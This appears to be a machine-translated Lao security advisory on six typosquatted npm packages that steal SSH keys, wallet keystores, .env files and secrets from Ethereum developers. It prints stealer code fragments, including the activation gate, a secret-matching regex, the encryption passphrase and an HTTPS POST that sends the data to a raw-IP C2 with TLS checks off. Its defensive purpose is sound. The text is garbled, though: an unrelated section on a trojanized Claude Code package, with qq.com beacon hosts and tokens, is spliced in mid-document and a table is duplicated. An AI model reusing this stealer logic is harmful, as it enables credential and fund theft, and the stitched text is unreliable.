ການໂຈມຕີ Typosquatting npm ຂອງ EVMDeFi ລັກເອົາລະຫັດນັກພັດທະນາ

ການໂຈມຕີ Typosquatting npm ຂອງ EVM/DeFi ໄດ້ລັກເອົາລະຫັດນັກພັດທະນາ

TL; DR

ໃນວັນທີ 6 ພຶດສະພາ 2026, ຜູ້ເຜີຍແຜ່ npm ດຽວ, namikazesarada010206ໄດ້ປ່ອຍແພັກເກດອັນຕະລາຍຫົກຊຸດທີ່ແນໃສ່ລະບົບນິເວດນັກພັດທະນາ Ethereum, Solidity ແລະ DeFi.

ແພັກເກັດຕ່າງໆ, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, ແລະ web3-utils-core, ໃຊ້ຊື່ທີ່ໜ້າເຊື່ອຖືທີ່ຖືກອອກແບບມາໃຫ້ເບິ່ງຄືກັບຫ້ອງສະໝຸດຜູ້ຊ່ວຍສຳລັບເຄື່ອງມື Web3 ທີ່ນິຍົມ.

ຊອງທັງຫົກຊອງມີສ່ວນປະກອບຄືກັນ telemetry.js ໄຟລ໌. ໄຟລ໌ມີຂະໜາດເທົ່າກັນໃນທົ່ວກຸ່ມ, ໂດຍມີ SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

ມັນແວບໍ່ໄດ້ເຮັດວຽກໃນເວລາຕິດຕັ້ງ. ບໍ່ມີ preinstall or postinstall hook. ແທນທີ່ຈະ, ມັນຈະເປີດໃຊ້ງານເມື່ອແພັກເກດຖືກນຳເຂົ້າຜ່ານ require().

ລາຍລະອຽດນັ້ນມີຄວາມສຳຄັນ.

ການຝັງຈະລໍຖ້າຈົນກວ່ານັກພັດທະນາຈະໃຊ້ແພັກເກດແທ້ໆ. ຫຼັງຈາກນັ້ນ, ມັນຈະກວດສອບວ່າສະຖານີເຮັດວຽກເບິ່ງຄືກັບສະພາບແວດລ້ອມການພັດທະນາ Ethereum / Solidity ແທ້ໆຫຼືບໍ່. ມັນຊອກຫາກະແຈ Alchemy ຫຼື Infura, ກະແຈສ່ວນຕົວ, ຕົວຊ່ວຍຈື່, ກະແຈ deployer, ຫຼືໄດເລກະທໍລີ Foundry ທ້ອງຖິ່ນ.

ຖ້າໂຮດກົງກັນ, ຜູ້ລັກຂະໂມຍຈະເກັບກຳລະຫັດສ່ວນຕົວ SSH, ບ່ອນເກັບລະຫັດກະເປົາເງິນ Foundry / Geth / Brownie, .env* ໄຟລ໌, ແລະຕົວແປສະພາບແວດລ້ອມທີ່ລະອຽດອ່ອນ. ມັນເຂົ້າລະຫັດມັດດ້ວຍ AES-256-GCM ໂດຍໃຊ້ປະໂຫຍກລະຫັດຜ່ານທີ່ຖືກເຂົ້າລະຫັດແລ້ວ ແລະ ກັ່ນຕອງມັນໄປຫາຈຸດສິ້ນສຸດ IPv4 C2 ດິບທີ່ຖືກປິດການໃຊ້ງານການກວດສອບ TLS.

ລະບົບເຕືອນໄພມັລແວຣ໌ (MEW) ຂອງ Xygeni ໄດ້ຢືນຢັນແພັກເກດທັງຫົກອັນວ່າເປັນອັນຕະລາຍ. ຊຸດລາຍງານການລຶບລົງທະບຽນ npm ຍັງຄ້າງຢູ່.

ກຸ່ມ: ຫົກແພັກເກດ, ໜຶ່ງຜູ້ເຜີຍແຜ່

ບັນຊີຜູ້ເຜີຍແຜ່ namikazesarada010206 ຖືກເຊື່ອມໂຍງກັບທີ່ຢູ່ Gmail ທີ່ຍັງບໍ່ໄດ້ຢືນຢັນ namikazesarada010206@gmail.com.

ແຄມເປນດັ່ງກ່າວໄດ້ປະກົດຕົວເປັນສິ່ງພິມມື້ດຽວໃນວັນທີ 6 ພຶດສະພາ 2026. ຊຸດທັງຫົກຊຸດໄດ້ຖືກດັດແປງເປັນ 1.0.0, ບໍ່ມີການເພິ່ງພາອາໄສເວລາແລ່ນ, ແລະ ສົ່ງພຽງແຕ່ສາມໄຟລ໌ເທົ່ານັ້ນ:

package.json index.js telemetry.js

ພວກເຂົາຍັງໄດ້ປະກາດບ່ອນເກັບມ້ຽນແຫຼ່ງຂໍ້ມູນດຽວກັນ:

https://github.com/harunosakura030303-maker/evmchain-config

ສາມແພັກເກດທຳອິດຖືກສະແກນໂດຍເຄື່ອງສະແກນ MEW ໃນການເຜີຍແຜ່ຄັ້ງທຳອິດ. ສາມແພັກເກດທີ່ເຫຼືອຖືກບັງຄັບໃຫ້ລາຍງານຫຼັງຈາກການທົບທວນໂປຣໄຟລ໌ npm ຂອງຜູ້ເຜີຍແຜ່ໂດຍນັກວິເຄາະ. ເມື່ອ byte-identical ດຽວກັນ telemetry.js ໄດ້ຮັບການຢືນຢັນໃນທົ່ວກຸ່ມ, ພວກມັນຖືກປິດຍ້ອນຄວາມສອດຄ່ອງ.

Package Version ເຜີຍແຜ່ npm ປີ້ MEW ຄໍາຕັດສິນ
viem-core 1.0.0 2026-05-06 01:38:44Z #51049 ເປັນອັນຕະລາຍ
viem-utils-core 1.0.0 2026-05-06 #51050 ເປັນອັນຕະລາຍ
ເຄື່ອງມືຫຼັກແບບ hardhat 1.0.0 2026-05-06 #51051 ເປັນອັນຕະລາຍ
evm-utils 1.0.0 2026-05-06 #51069 ເປັນອັນຕະລາຍ, ໂດຍຄວາມສອດຄ່ອງ
ອຸປະກອນໂຮງຫລໍ່ 1.0.0 2026-05-06 #51071 ເປັນອັນຕະລາຍ, ໂດຍຄວາມສອດຄ່ອງ
web3-utils-core 1.0.0 2026-05-06 #51070 ເປັນອັນຕະລາຍ, ໂດຍຄວາມສອດຄ່ອງ

ຍຸດທະສາດການຕັ້ງຊື່ແມ່ນງ່າຍດາຍແຕ່ມີປະສິດທິພາບ.

ແພັກເກດເຫຼົ່ານີ້ບໍ່ໄດ້ປອມແປງຊື່ຕົ້ນນ້ຳທີ່ແນ່ນອນ. ແທນທີ່ຈະ, ພວກມັນໃຊ້ຄຳຕໍ່ທ້າຍ "utility" ທີ່ເປັນໄປໄດ້ເຊັ່ນ: -core, -utils, ແລະ -utils-coreສິ່ງນັ້ນເຮັດໃຫ້ພວກມັນເບິ່ງຄືກັບຫ້ອງສະໝຸດຄູ່ທີ່ນັກພັດທະນາອາດຄາດຫວັງວ່າຈະເຫັນຢູ່ໃກ້ໆກັບເຄື່ອງມື Web3.

ແພັກເກດທີ່ເປັນອັນຕະລາຍ ເປົ້າໝາຍທີ່ຖືກຕ້ອງຕາມກົດໝາຍ
viem-core viem, ລູກຄ້າ Ethereum TypeScript ທີ່ໄດ້ຮັບຄວາມນິຍົມ
viem-utils-core ວິມ
ເຄື່ອງມືຫຼັກແບບ hardhat hardhat, ສະພາບແວດລ້ອມການພັດທະນາ Solidity ຫຼັກ
evm-utils namespace ເຄື່ອງມື EVM ທົ່ວໄປ
ອຸປະກອນໂຮງຫລໍ່ ໂຮງຫລໍ່, ລະບົບຕ່ອງໂສ້ເຄື່ອງມື Solidity
web3-utils-core web3-utils, ຕົວຊ່ວຍ Web3.js

ນີ້ແມ່ນຮູບແບບ "ແພັກເກດເສີມ": ບໍ່ແມ່ນ "ຂ້ອຍເປັນແພັກເກດທີ່ແທ້ຈິງ," ແຕ່ "ຂ້ອຍເບິ່ງຄືວ່າເປັນຜູ້ຊ່ວຍທີ່ສົມເຫດສົມຜົນຢູ່ອ້ອມຮອບແພັກເກດທີ່ແທ້ຈິງ."

ສຳລັບນັກພັດທະນາ DeFi ທີ່ເຄື່ອນໄຫວຢ່າງວ່ອງໄວ, ນັ້ນກໍພຽງພໍທີ່ຈະສ້າງຄວາມສ່ຽງ.

ຈະເກີດຫຍັງຂຶ້ນເມື່ອການຫຸ້ມຫໍ່ຖືກນໍາເຂົ້າ

ລະບົບຕ່ອງໂສ້ການໂຈມຕີມີຂະໜາດນ້ອຍ, ມີເຈດຕະນາ, ແລະ ສຸມໃສ່ສະພາບແວດລ້ອມການພັດທະນາລະຫັດລັບ.

ບໍ່ມີຕະຂໍຕິດຕັ້ງ. ແທນທີ່ຈະ, ແຕ່ລະຊຸດປະກອບມີ index.js ທີ່ສົ່ງອອກໜ້າທີ່ຂອງ stub ແລະຫຼັງຈາກນັ້ນໂຫຼດໂມດູນ telemetry ທີ່ເປັນອັນຕະລາຍ.

require('./telemetry').init();

ນີ້ໝາຍຄວາມວ່າມັນແວຈະເປີດໃຊ້ງານໃນການນຳເຂົ້າຄັ້ງທຳອິດ.

ນັ້ນເປັນປະໂຫຍດໃນການດໍາເນີນງານສໍາລັບຜູ້ໂຈມຕີ. ເຄື່ອງສະແກນ ແລະ sandbox ຈໍານວນຫຼາຍສຸມໃສ່ພຶດຕິກໍາການຕິດຕັ້ງ. ຊຸດນີ້ລໍຖ້າຈົນກວ່າມັນຈະຖືກໃຊ້ໂດຍນັກພັດທະນາ, ສະຄຣິບສ້າງ, ຊຸດການທົດສອບ, ຫຼືເສັ້ນທາງເວລາແລ່ນ.

ປະຕູເປີດໃຊ້ງານ: ໃຊ້ໄດ້ສະເພາະໃນສະຖານີເຮັດວຽກຂອງນັກພັດທະນາ Web3 ຕົວຈິງເທົ່ານັ້ນ

ສ່ວນທີ່ສຳຄັນທີ່ສຸດຂອງການຝັງແມ່ນປະຕູກະຕຸ້ນ.

ມັນແວກວດສອບຕົວແປສະພາບແວດລ້ອມທີ່ພົບເລື້ອຍໃນເຄື່ອງພັດທະນາ Ethereum / Solidity:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

ມັນຍັງກວດສອບວ່າ Foundry ເບິ່ງຄືວ່າຖືກຕິດຕັ້ງແລ້ວຫຼືບໍ່:

fs.existsSync(path.join(os.homedir(), '.foundry'))

ຖ້າເງື່ອນໄຂທັງສອງບໍ່ເປັນຈິງ, ຟັງຊັນຈະສົ່ງຄືນ ແລະ ບໍ່ເຮັດຫຍັງເລີຍ.

ສິ່ງນັ້ນເຮັດໃຫ້ແພັກເກດງຽບກວ່າໃນສະພາບແວດລ້ອມການວິເຄາະທົ່ວໄປ. sandbox ທີ່ບໍ່ມີ Foundry, Alchemy keys, Infura keys, private keys, ຫຼື mnemonics ອາດຈະເຫັນການນໍາເຂົ້າທີ່ເບິ່ງຄືວ່າບໍ່ເປັນອັນຕະລາຍ.

ໃນໂຮດທີ່ກົງກັນ, ມັນແວຈະລໍຖ້າ 60 ຫາ 90 ວິນາທີກ່ອນທີ່ຈະເກັບກຳ:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

ຄວາມຊັກຊ້າຫຼຸດຜ່ອນຄວາມສຳພັນທີ່ຊັດເຈນລະຫວ່າງການນຳເຂົ້າ ແລະ ການກັ່ນກອງ. .unref() call ຍັງຊ່ວຍໃຫ້ຂະບວນການໂຮດອອກຈາກປົກກະຕິຖ້າແພັກເກດຖືກນໍາເຂົ້າໃນສະຄຣິບທີ່ມີອາຍຸສັ້ນ.

ນີ້ບໍ່ແມ່ນພຶດຕິກຳການທຸບແລ້ວຈັບທີ່ມີສຽງດັງ. ມັນເປັນຕົວລັກແບບເປົ້າໝາຍທີ່ຖືກອອກແບບມາເພື່ອຫຼີກເວັ້ນການເຮັດວຽກ ເວັ້ນເສຍແຕ່ວ່າສະພາບແວດລ້ອມຂອງນັກພັດທະນາຄຸ້ມຄ່າທີ່ຈະລັກໄດ້.

ສິ່ງທີ່ຜູ້ລັກເກັບກຳ

ເມື່ອປະຕູເປີດໃຊ້ງານຜ່ານໄປ, ມັນແວຈະເກັບກຳຈາກແຫຼ່ງທີ່ສຳຄັນທີ່ສຸດໃນການພັດທະນາ Web3: ລະຫັດສ່ວນຕົວ, ບ່ອນເກັບລະຫັດກະເປົາເງິນ, ຂໍ້ມູນປະຈຳຕົວໃນການນຳໃຊ້, ຄວາມລັບຂອງຄລາວ, ໂທເຄັນ npm, ແລະ ການຕັ້ງຄ່າໂຄງການທ້ອງຖິ່ນ.

ແຫຼ່ງຂໍ້ມູນ ສິ່ງທີ່ເກັບກຳ
process.env ຕົວແປໃດກໍໄດ້ທີ່ກົງກັບ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* ໄຟລ໌ທີ່ມີ PRIVATE KEY ຫຼື BEGIN OPENSSH, ລວມທັງເນື້ອໃນໄຟລ໌ເຕັມ
~/.foundry/keystores/* ໄຟລ໌ keystore ຂອງກະເປົາເງິນ Foundry
~/.ethereum/ບ່ອນເກັບລະຫັດ/* ໄຟລ໌ທີ່ເກັບລະຫັດກະເປົາເງິນ Geth
~/.brownie/ບັນຊີ/* ໄຟລ໌ເກັບຮັກສາກະແຈກະເປົາເງິນ Brownie
${cwd}/.env ເນື້ອໃນໄຟລ໌ເຕັມ
${cwd}/.env.local ເນື້ອໃນໄຟລ໌ເຕັມ
${cwd}/.env.production ເນື້ອໃນໄຟລ໌ເຕັມ
${cwd}/.env.ການພັດທະນາ ເນື້ອໃນໄຟລ໌ເຕັມ
ຊື່ໂຮສຕ໌ os.() ຂໍ້ມູນເມຕາຂອງໂຮສ
crypto.randomUUID() ຕົວລະບຸຜູ້ເຄາະຮ້າຍ/ກອງປະຊຸມ
Date.now() ປະທັບເວລາການເກັບກຳ
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ໂທເຄັນ ATTA ແມ່ນ:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

ພວກເຮົາບໍ່ສາມາດຢືນຢັນໄດ້ວ່າ telemetry ແມ່ນການວິເຄາະຂອງຜູ້ປະກອບການເອງ ຫຼື ເປັນຊ່ອງທາງທີ່ສ້າງລາຍໄດ້ແຍກຕ່າງຫາກ. ໂທເຄັນ ATTA ແມ່ນຄືກັນໃນທັງສອງຕົວຢ່າງທີ່ພວກເຮົາໄດ້ກວດສອບ.

ກຸ່ມ B: heibai

claude.hk ການຫຼອກລວງ OAuth + ການລັກລອບ ANTHROPIC_BASE_URL

ຕົວຢ່າງວັນທີ 1 ເມສາ ແມ່ນສ່ວນໜຶ່ງທີ່ຫຍາບຄາຍກວ່າ ແລະ ກ່ອນໜ້ານີ້ຂອງການໂຄສະນາຫາສຽງ.

heibai:2.1.88-claude.hk-4 ຈັດພີມມາໂດຍ wuguoqiangvip28, ບັນຊີທີ່ສ້າງຂຶ້ນໃນວັນທີ 7 ມິຖຸນາ 2025. ຊຸດດັ່ງກ່າວໄດ້ດັດແປງຕົວມັນເອງຢ່າງຊັດເຈນຕໍ່ກັບສິ່ງທີ່ຖືກຕ້ອງຕາມກົດໝາຍ 2.1.88 ການປ່ອຍຕົວຂອງມະນຸດ.

ມັນບໍ່ໄດ້ລົບກວນກັບ CA-cert MITM. ແທນທີ່ຈະ, ມັນຕົວະຜູ້ໃຊ້ກ່ຽວກັບຈຸດສິ້ນສຸດ OAuth.

ສິ່ງທີ່ເພີ່ມເຂົ້າໄປທີ່ເປັນອັນຕະລາຍນອກເໜືອໄປຈາກແຫຼ່ງທີ່ມາຂອງ Claude Code ທີ່ຮົ່ວໄຫຼອອກມາປະກອບມີ:

ແຫຼ່ງຂໍ້ມູນ ສິ່ງທີ່ເກັບກຳ
process.env ຕົວແປໃດກໍໄດ້ທີ່ກົງກັບ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* ໄຟລ໌ທີ່ມີ PRIVATE KEY ຫຼື BEGIN OPENSSH, ລວມທັງເນື້ອໃນໄຟລ໌ເຕັມ
~/.foundry/keystores/* ໄຟລ໌ keystore ຂອງກະເປົາເງິນ Foundry
~/.ethereum/ບ່ອນເກັບລະຫັດ/* ໄຟລ໌ທີ່ເກັບລະຫັດກະເປົາເງິນ Geth
~/.brownie/ບັນຊີ/* ໄຟລ໌ເກັບຮັກສາກະແຈກະເປົາເງິນ Brownie
${cwd}/.env ເນື້ອໃນໄຟລ໌ເຕັມ
${cwd}/.env.local ເນື້ອໃນໄຟລ໌ເຕັມ
${cwd}/.env.production ເນື້ອໃນໄຟລ໌ເຕັມ
${cwd}/.env.ການພັດທະນາ ເນື້ອໃນໄຟລ໌ເຕັມ
ຊື່ໂຮສຕ໌ os.() ຂໍ້ມູນເມຕາຂອງໂຮສ
crypto.randomUUID() ຕົວລະບຸຜູ້ເຄາະຮ້າຍ/ກອງປະຊຸມ
Date.now() ປະທັບເວລາການເກັບກຳ

ບັນຊີລາຍຊື່ເປົ້າໝາຍແມ່ນມີຄວາມຊັດເຈນສູງ. ນີ້ບໍ່ແມ່ນການລັກຂະໂມຍໂປຣແກຣມທ່ອງເວັບທົ່ວໄປ ຫຼື ການຂູດຂໍ້ມູນປະຈຳຕົວຢ່າງກວ້າງຂວາງ. ມັນແນໃສ່ນັກພັດທະນາຜູ້ທີ່ສ້າງ, ທົດສອບ, ນຳໃຊ້ ຫຼື ດຳເນີນງານແອັບພລິເຄຊັນ Ethereum.

ການລວມເອົາບ່ອນເກັບລະຫັດ Foundry, Geth, ແລະ Brownie ແມ່ນມີຄວາມສຳຄັນເປັນພິເສດ. ໄຟລ໌ເຫຼົ່ານີ້ສາມາດສະແດງເຖິງການເຂົ້າເຖິງກະເປົາເງິນ ຫຼື ຕົວຕົນການນຳໃຊ້ໂດຍກົງ. ຖ້າຜູ້ໂຈມຕີສາມາດຈັບຄູ່ພວກມັນກັບລະຫັດຜ່ານ, ຕົວຊ່ວຍຈື່ຈຳ, ຫຼື ຄວາມລັບຂອງສະພາບແວດລ້ອມ, ພວກເຂົາອາດຈະສາມາດຍ້າຍເງິນ, ປອມຕົວເປັນຜູ້ນຳໃຊ້, ຫຼື ປະນີປະນອມການດຳເນີນງານສັນຍາສະຫຼາດໄດ້.

ການເຂົ້າລະຫັດກ່ອນການກັ່ນຕອງ

ມັນແວຣ໌ຈະເຂົ້າລະຫັດຂໍ້ມູນທີ່ເກັບກຳໄດ້ກ່ອນທີ່ຈະສົ່ງມັນອອກໄປ.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

ວະລີລະຫັດຜ່ານທີ່ຖືກເຂົ້າລະຫັດແມ່ນ:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

payload ສຸດທ້າຍຖືກຫໍ່ເປັນ JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

ການເຂົ້າລະຫັດບໍ່ໄດ້ເຮັດໃຫ້ມັລແວຣ໌ກ້າວໜ້າຂຶ້ນດ້ວຍຕົວມັນເອງ. ເຖິງຢ່າງໃດກໍ່ຕາມ, ມັນເຮັດໃຫ້ການກວດສອບເຄືອຂ່າຍຍາກຂຶ້ນ. ຜູ້ຖືກປ້ອງກັນທີ່ເຝົ້າເບິ່ງການອອກໄປຈະເຫັນ payload JSON, ແຕ່ບໍ່ແມ່ນກະແຈທີ່ຖືກລັກ, ໄຟລ໌ກະເປົາເງິນ, ຫຼື .env ເນື້ອຫາໂດຍບໍ່ມີລະຫັດຜ່ານທີ່ຖືກເຂົ້າລະຫັດ ແລະ ເຫດຜົນຂອງການຖອດລະຫັດ.

ການກັ່ນຕອງໄປຫາ Raw IPv4 C2

ເສັ້ນທາງການກັ່ນຕອງແມ່ນຖືກລະຫັດໄວ້ແລ້ວ:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

ມັນແວສົ່ງຂໍ້ມູນໄປຫາ:

https://76.13.37.80:8443/api/v1/telemetry

ສອງລາຍລະອຽດທີ່ໂດດເດັ່ນ.

ຫນ້າທໍາອິດ, C2 ແມ່ນທີ່ຢູ່ IPv4 ດິບແທນທີ່ຈະເປັນໂດເມນ. ສິ່ງນັ້ນຊ່ວຍລົບລ້າງຄວາມຕ້ອງການໃນການລົງທະບຽນໂດເມນ ແລະ ຫຼີກລ່ຽງການກວດຈັບທີ່ອີງໃສ່ໂດເມນບາງຢ່າງ.

ອັນທີສອງ, ການຢັ້ງຢືນ TLS ຖືກປິດໃຊ້ງານດ້ວຍ:

rejectUnauthorized: false

ສິ່ງນັ້ນຊ່ວຍໃຫ້ມັນແວຍອມຮັບໃບຢັ້ງຢືນໃດໆ, ລວມທັງໃບຢັ້ງຢືນທີ່ເຊັນດ້ວຍຕົນເອງ. ເວົ້າອີກຢ່າງໜຶ່ງ, ຜູ້ໂຈມຕີໄດ້ຮັບການສົ່ງຂໍ້ມູນທີ່ຖືກເຂົ້າລະຫັດໂດຍບໍ່ຕ້ອງມີໃບຢັ້ງຢືນສາທາລະນະທີ່ຖືກຕ້ອງ.

ບໍ່ມີເຫດຜົນການລອງໃໝ່ ແລະ ບໍ່ມີໂຮສສຳຮອງ. ຄວາມຜິດພາດຈະຖືກກືນກິນຢ່າງງຽບໆ. ສິ່ງນີ້ເຮັດໃຫ້ແພັກເກດງຽບຖ້າ C2 ອອບໄລນ໌ ຫຼື ບໍ່ສາມາດຕິດຕໍ່ໄດ້.

ເປັນຫຍັງແຄມເປນນີ້ຈຶ່ງສຳຄັນ

ແພັກເກດ npm ທີ່ເປັນອັນຕະລາຍສ່ວນໃຫຍ່ທີ່ແນໃສ່ນັກພັດທະນາທີ່ໄລ່ຕາມຂໍ້ມູນປະຈຳຕົວທີ່ກວ້າງຂວາງ: ໂທເຄັນ npm, ລະຫັດ AWS, ໂທເຄັນ GitHub ຫຼື .npmrc ໄຟລ໌.

ແຄມເປນນີ້ເຮັດໃຫ້ເປົ້າໝາຍແຄບລົງ.

ມັນຊອກຫາສັນຍານທີ່ສະແດງໃຫ້ເຫັນວ່າເຄື່ອງດັ່ງກ່າວເປັນຂອງຜູ້ພັດທະນາ Ethereum ຫຼື Solidity. ຫຼັງຈາກນັ້ນ, ມັນຈະດຶງເອົາຊັບສິນທີ່ສຳຄັນໃນສະພາບແວດລ້ອມນັ້ນຢ່າງແນ່ນອນ: ບ່ອນເກັບລະຫັດກະເປົາເງິນ, ລະຫັດສ່ວນຕົວ, ຕົວຊ່ວຍຈື່ຈຳ, ລະຫັດຜູ້ນຳໃຊ້, .env ໄຟລ໌, ແລະກະແຈ SSH.

ນັ້ນເຮັດໃຫ້ແຄມເປນເປັນອັນຕະລາຍຫຼາຍສຳລັບທີມງານ Web3 ກ່ວາຕົວລັກ npm ທົ່ວໄປ.

ການຕິດເຊື້ອທີ່ປະສົບຜົນສຳເລັດອາດຈະເຮັດໃຫ້ເກີດ:

  • ກະເປົາເງິນສຳລັບການນຳໃຊ້
  • ລະຫັດຜູ້ເບິ່ງແຍງລະບົບສັນຍາອັດສະລິຍະ
  • ລະຫັດຜູ້ໃຫ້ບໍລິການ RPC
  • ຂໍ້ມູນປະຈຳຕົວການນຳໃຊ້ຄລາວ
  • ໂທເຄັນການເຜີຍແຜ່ npm
  • ການເຂົ້າເຖິງ SSH ຕໍ່ກັບນັກພັດທະນາ ຫຼື ໂຄງສ້າງພື້ນຖານ
  • ຄວາມລັບຂອງໂຄງການຖືກເກັບໄວ້ໃນ .env ໄຟ
  • ບ່ອນເກັບລະຫັດກະເປົາເງິນສຳລັບ Foundry, Geth, ຫຼື Brownie

ຊື່ແພັກເກດຍັງສະແດງໃຫ້ເຫັນເຖິງວິສະວະກຳສັງຄົມທີ່ຊັດເຈນ. ພວກມັນແນໃສ່ລະບົບນິເວດຂອງນັກພັດທະນາ Web3 ຜ່ານຊື່ເຄື່ອງມືທີ່ຄຸ້ນເຄີຍ: viem, hardhat, foundry, evm, ແລະ web3.

ນັກສະແດງບໍ່ຈຳເປັນຕ້ອງປະນີປະນອມໂຄງການຕົວຈິງ. ພວກເຂົາພຽງແຕ່ຕ້ອງການນັກພັດທະນາເພື່ອຕິດຕັ້ງສິ່ງທີ່ເບິ່ງຄືວ່າເປັນແພັກເກດທີ່ສົມເຫດສົມຜົນ.

ຕົວຊີ້ວັດຂອງການປະນີປະນອມ ແລະ ການກວດຈັບ

ແພັກເກດ ແລະ ຜູ້ເຜີຍແຜ່
ພາກສະຫນາມ ມູນຄ່າ
ຜູ້ເຜີຍແຜ່ npm namikazesarada010206
ອີເມວຂອງຜູ້ເຜີຍແຜ່ namikazesarada010206@gmail.com
ອີເມລ໌ຢັ້ງຢືນແລ້ວ No
SCM ຢືນຢັນ No
ຄະແນນຊື່ສຽງ 1.0
ການຫຸ້ມຫໍ່ viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
ສະບັບ ທັງຫມົດ 1.0.0
ບ່ອນເກັບຂໍ້ມູນແຫຼ່ງຂໍ້ມູນ https://github.com/harunosakura030303-maker/evmchain-config
ຢືນຢັນແລ້ວວ່າເປັນອັນຕະລາຍ ແພັກເກດທັງຫົກອັນ
ເຄືອຂ່າຍ
ປະເພດ ມູນຄ່າ
ຈຸດສິ້ນສຸດ C2 https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
ພອດ C2 8443/tcp
ພຶດຕິກຳຂອງ TLS ປະຕິເສດບໍ່ໄດ້ຮັບອະນຸຍາດ: false
ຮູບແບບການໂຫຼດ {"v":2,"iv": , "ດ": ,"ທ": }
ໄຟລ໌ ແລະ ແຮຊ
ປະເພດ ມູນຄ່າ
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
ຮູບແບບການຫຸ້ມຫໍ່ package.json, index.js, telemetry.js
ຈຳນວນໄຟລ໌ 3
ຂະໜາດທັງໝົດປະມານ 3.4 KB

ສັນຍານການເປີດໃຊ້ງານ

ມັນແວກວດສອບຕົວແປສະພາບແວດລ້ອມເຫຼົ່ານີ້:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

ມັນຍັງກວດສອບ:

~/.foundry/

ເສັ້ນທາງໂຮດເປົ້າໝາຍ

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

ການເກັບກຳແບບປົກກະຕິ

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

ບັນທຶກການກວດຈັບ

ກົດລະບຽບຫຼາຍຢ່າງຈັບເອົາແຄມເປນນີ້ໂດຍບໍ່ຈໍາເປັນຕ້ອງມີການວິເຄາະພຶດຕິກໍາຢ່າງຄົບຖ້ວນ.

ກ່ອນອື່ນໝົດ, ໃຫ້ສະແກນໄຟລ໌ລັອກເພື່ອຊອກຫາຊື່ແພັກເກດທີ່ເປັນອັນຕະລາຍຫົກຊື່:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

ການແຂ່ງຂັນໃດໆໃນ package-lock.json, yarn.lock, pnpm-lock.yaml, ຫຼື node_modules ປະຫວັດສາດຄວນຖືກຖືວ່າເປັນເຫດການທີ່ຮ້າຍແຮງ.

ອັນທີສອງ, ຕິດຕາມກວດກາຂະບວນການ Node.js ທີ່ອ່ານເສັ້ນທາງ keystore ຂອງກະເປົາເງິນ:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

ນີ້ບໍ່ຄ່ອຍຈະເປັນພຶດຕິກຳທີ່ຖືກຕ້ອງຕາມກົດໝາຍສຳລັບແພັກເກດທີ່ນຳເຂົ້າເປັນການເພິ່ງພາອາໄສຂອງຜູ້ຊ່ວຍ. ມັນມີຄວາມໜ້າສົງໄສໂດຍສະເພາະເມື່ອຕິດຕາມດ້ວຍກິດຈະກຳເຄືອຂ່າຍທີ່ສົ່ງອອກ.

ອັນທີສາມ, ບລັອກ ຫຼື ແຈ້ງເຕືອນກ່ຽວກັບການເຊື່ອມຕໍ່ HTTPS ເພື່ອ:

76.13.37.80:8443

ໂດຍສະເພາະເມື່ອເສັ້ນທາງການຮ້ອງຂໍແມ່ນ:

/api/v1/telemetry

ອັນທີສີ່, ຄົ້ນຫາແພັກເກດ npm ທີ່ລວມເອົາຄຸນລັກສະນະເຫຼົ່ານີ້:

  • ຜູ້ເຜີຍແຜ່ໃໝ່ ຫຼື ຜູ້ເຜີຍແຜ່ທີ່ມີຊື່ສຽງຕ່ຳ
  • ບັນຊີ Gmail ທີ່ຍັງບໍ່ໄດ້ຢືນຢັນ
  • ຊື່ແພັກເກດທີ່ຢູ່ຕິດກັບ Web3
  • ບໍ່ມີປະຫວັດການເກັບຮັກສາທີ່ມີຄວາມໝາຍ
  • ຮູບແບບແພັກເກດຂະໜາດນ້ອຍ
  • index.js ທີ່ໂຫຼດ telemetry ຫຼືໄຟລ໌ຊ່ວຍເຫຼືອ
  • ບໍ່ມີການເພິ່ງພາອາໄສເວລາແລ່ນ
  • ການເກັບກຳຕົວແປສະພາບແວດລ້ອມທີ່ລະອຽດອ່ອນ
  • ການເຂົ້າເຖິງບ່ອນເກັບກະແຈ Wallet

ຮູບແບບນີ້ມີປະໂຫຍດຫຼາຍກວ່າ IOC ດຽວ ເພາະວ່າແພັກເກດຕໍ່ໄປອາດຈະປ່ຽນທີ່ຢູ່ IP ແຕ່ຮັກສາເຫດຜົນການກຳນົດເປົ້າໝາຍຄືເກົ່າ.

ລາຍການກວດສອບການຕອບສະໜອງຕໍ່ການປະນີປະນອມ

ຖ້ານັກພັດທະນາໃຊ້ໜຶ່ງໃນຫົກແພັກເກດ ແລະ ສະພາບແວດລ້ອມຂອງເຂົາເຈົ້າກົງກັບປະຕູການເປີດໃຊ້ງານ, ໃຫ້ຖືວ່າສະຖານີເຮັດວຽກຖືກໂຈມຕີ.

